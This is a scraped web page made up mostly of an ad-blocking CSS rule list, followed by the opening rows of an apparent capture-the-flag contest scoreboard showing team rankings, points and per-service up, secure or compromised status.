WireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style> + +<body> +<div class="hold_table"> +<table width="100%" id="scoretable" class="tablesorter"> +<thead class="score_table_head"><tr><th title="#" class="header">#</th><th title="Team" class="header">Team</th><th title="Country" class="header">Country</th><th title="Points" class="header">Points</th><th title="Money" class="header">Money</th><th title="convicts" class="header">convic..</th><th title="egoats" class="header">egoats</th><th title="mailgateway" class="header">mailga..</th><th title="msgdispatcher" class="header">msgdis..</th><th title="muleadmin" class="header">mulead..</th><th title="mulemanager" class="header">mulema..</th><th title="mulemassageappointment" class="header">mulema..</th><th title="muleuser" class="header">muleus..</th><th title="sendalert" class="header">sendal..</th><th title="smsgateway" class="header">smsgat..</th></tr></thead><tbody class="score_table_body"><tr class="d0"><td>1</td><td><img width="20px" height="="20px"" src="146.jpg"><b> We_0wn_Y0u </b></td><td>AT <img src="at.png"></td><td><b>1791.0</b></td><td>4</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>2</td><td><img width="20px" height="="20px"" src="196.jpg"><b> More Smoked Leet Chicken </b></td><td>RU <img src="ru.png"></td><td><b>1704.0</b></td><td>3</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>3</td><td><img width="20px" height="="20px"" src="182.jpg"><b> FluxFingers </b></td><td>DE <img src="de.png"></td><td><b>1105.2</b></td><td>50</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>4</td><td><img width="20px" height="="20px"" src="189.jpg"><b> PPP </b></td><td>US <img src="us.png"></td><td><b>965.4</b></td><td>39</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>5</td><td><img width="20px" height="="20px"" src="130.jpg"><b> CISSP Groupies </b></td><td>CA <img src="ca.png"></td><td><b>926.8</b></td><td>22</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" 